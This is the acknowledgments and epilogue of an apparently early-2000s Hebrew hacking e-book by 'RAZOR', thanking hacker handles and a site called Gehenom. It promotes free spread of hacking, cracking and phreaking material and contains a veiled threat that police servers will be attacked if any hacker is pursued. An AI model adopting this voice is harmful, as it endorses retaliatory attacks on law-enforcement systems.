תודה לצוות אתר גיהנום , אחלה אתר – תמיד תוכלו ללמוד משם דברים חדשים – כתובתו היא :

http://www.gehenom.co.il

 

תודה ענקית למי שבלעדיהם לא היה לכם את הספר :

 

GeHeNoM, Blood Runner, Rul3r, Pirs[i]ng, E-Man , AiTi , Dr.Brain , Jacob, Asc, Batman911, Sbh, CaTax, Bentz, y0g1 b3ar, IceFire3k, Rel8t, Milki, AKA, VB-Man, Cool-Guy, Zeos, BoR|S, waMaw, PancherMaher, Boba Smith, ^Dak0Da^, ZeBra, Vortex, The-Mod, NDR311, Counter and to all the hackers in the world .

 

ועכשיו נעבור לתודות בעברית :

 

פנצ'ו, ניב ואשד ( התותחים הכי כבדים J ),יוליה,  אלה, גלה, גלית, אלי , בן-לאדן ( השובב) ותודה ענקית אחרונה למפכ"ל המשטרה (: .

 

 

 

 

 

 

 

 

סוף דבר

 

זהו זה עומד להסתיים עוד כמה רגעים, החלום שלי יתגשם סוף סוף

והספר יופץ ברחבי הנט .

 

הספר הזה נכתב בשביל שלכם\ן יהיה את הכוח לדעת, מי שקרא את הספר הוא לא האקר - בשביל להיות האקר את\ה צריך\ה ללמוד עוד הרבה דברים, בעיקר לשנות את דפוסי ההתנהגות, פעם שאלו אותי איך זה להיות האקר וכך אמרתי :

 

האם ראיתם את הסרט Hackers ? אם כן זה דיי דומה אבל החלק השונה הוא שלרוב הפריצות הם הרבה יותר קשות אבל הקטעים עם החברים והטלפוניה מזכירים במקצת את התרבות שלנו – אני ממליץ לכולם לראות את הסרט ולהבין .

 

זה הספר הראשון בעברית על האקינג (גם לא ידוע לי שיש באנגלית)

ונראה לי שזה יהיה האחרון ( הגמדים השמנים הכחולים  בטח ירדפו אחריי...) אבל אני מבטיח שאם לספר זה יהיה פופלריות גדולה אנחנו נכתוב ספר בשנה הבאה .

 

אז אני לא טוב בפרידות אבל זה הולך ככה (:

 

החלום התגשם ו - 200 ע"מ של האקינג\קראקינג\פריקינג\אנרכייה מחולקים בחינם לכל אדם ברחבי הנט - הכחולים יעשו בעיות ואולי יתפסו אחד מאיתנו, אני מזהיר שאם הם יטפלו באחד

ההאקרים בגלל הספר הסרבר שלהם יצטרך להזיע כמו שבן-לאדן עכשיו מזיע בתוך האהל שלו !

 

 

אני מבקש מכל ממך להפיץ את הספר לכמה שיותר אנשים וזה רק בגלל שהרעיון של הספר הוא הפצת המידע בחינם לכל דורש .

 

תודה לכם על זה שקראתם את הספר, מקווה שנהניתן\ם .

 

 

By RAZOR

 

E O F

Hosted by www.Geocities.ws

1